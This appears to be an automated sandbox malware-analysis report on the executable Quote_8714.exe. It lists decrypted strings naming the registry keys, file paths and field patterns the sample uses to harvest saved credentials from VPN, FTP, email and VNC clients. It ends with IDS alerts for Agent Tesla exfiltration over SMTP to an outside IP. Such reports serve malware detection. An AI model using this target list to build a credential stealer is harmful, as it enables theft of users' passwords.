Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: APPDATA
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Psi+\profiles
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: OpenVPN
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: username
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: auth-data
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: entropy
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: USERPROFILE
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \OpenVPN\config\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: remote
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: remote
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: NordVPN
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: NordVPN
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: NordVpn.exe*
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: user.config
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: //setting[@name='Username']/value
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: NordVPN
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: %ProgramW6432%
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Private Internet Access\data
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Private Internet Access\data
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \account.json
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ."username":"(.?)"
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ."password":"(.?)"
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: privateinternetaccess.com
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: FileZilla
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: APPDATA
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: APPDATA
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <Server>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <Host>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <Host>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </Host>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <Port>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </Port>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <User>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <User>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </User>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </Pass>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <Pass>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </Pass>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: CoreFTP
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: User
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Host
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Port
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: hdfzpysvpzimorhk
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: WinSCP
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: HostName
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UserName
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: PublicKeyFile
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: PortNumber
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: WinSCP
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ABCDEF
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Flash FXP
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: port
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: user
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: pass
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: quick.dat
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Sites.dat
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: FTP Navigator
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SystemDrive
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Server
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: No Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: User
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SmartFTP
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: APPDATA
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: WS_FTP
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: appdata
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: HOST
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: PWD=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: PWD=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: FtpCommander
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SystemDrive
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SystemDrive
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SystemDrive
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \cftp\Ftplist.txt
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ;Password=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ;User=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ;Server=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ;Port=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ;Port=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ;Password=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ;User=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ;Anonymous=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: FTPGetter
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \FTPGetter\servers.xml
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <server>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <server_ip>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <server_ip>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </server_ip>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <server_port>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </server_port>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </server_user_name>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </server_user_password>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: FTPGetter
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: The Bat!
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: appdata
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \The Bat!
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Becky!
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: DataDir
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Folder.lst
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Mailbox.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Account
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: PassWd
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Account
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SMTPServer
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Account
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: MailAddress
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Becky!
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Outlook
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Email
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: IMAP Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: POP3 Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: HTTP Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SMTP Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Email
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Email
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Email
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: IMAP Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: POP3 Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: HTTP Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SMTP Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Server
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Windows Mail App
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Email
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Server
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SchemaId
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: pResourceElement
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: pPackageSid
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: syncpassword
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: mailoutgoing
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: FoxMail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Executable
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: FoxmailPath
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Storage\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Storage\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \mail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \mail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Account.stg
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Account.stg
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: POP3Host
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SMTPHost
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: IncomingServer
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Account
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: MailAddress
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: POP3Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Opera Mail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: opera:
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: PocoMail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: appdata
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Pocomail\accounts.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Email
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: POPPass
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SMTPPass
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SMTP
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: eM Client
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: eM Client\accounts.dat
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: eM Client
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Accounts
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: "Username":"
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: "Secret":"
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: "ProviderName":"
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: o6806642kbM7c5
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Mailbird
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SenderIdentities
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Accounts
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Server_Host
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Accounts
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Email
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Username
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: EncryptedPassword
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Mailbird
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\ORL\WinVNC3
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: TightVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: TightVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: PasswordViewOnly
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: TightVNC ControlPassword
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ControlPassword
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: TigerVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\TigerVNC\Server
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UltraVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: passwd
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UltraVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: passwd2
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UltraVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: passwd
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UltraVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: passwd2
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UltraVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: passwd
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UltraVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: passwd2
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UltraVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: passwd
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UltraVNC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: passwd2
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: JDownloader 2.0
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: JDownloader 2.0\cfg
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: JDownloader 2.0\cfg
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Paltalk
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: nickname

Source: Quote_8714.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Quote_8714.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: Quote_8714.exe, 00000000.00000002.1745088291.0000000000D07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: Quote_8714.exe, 00000000.00000002.1745088291.0000000000D07000.00000004.00000020.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49735 -> 199.79.62.115:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49735 -> 199.79.62.115:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49735 -> 199.79.62.115:587
Source: Network traffic	Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.4:49735 -> 199.79.62.115:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49735 -> 199.79.62.115:587

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 199.79.62.115:587

Source: Joe Sandbox View

IP Address: 199.79.62.115 199.79.62.115

Source: global traffic

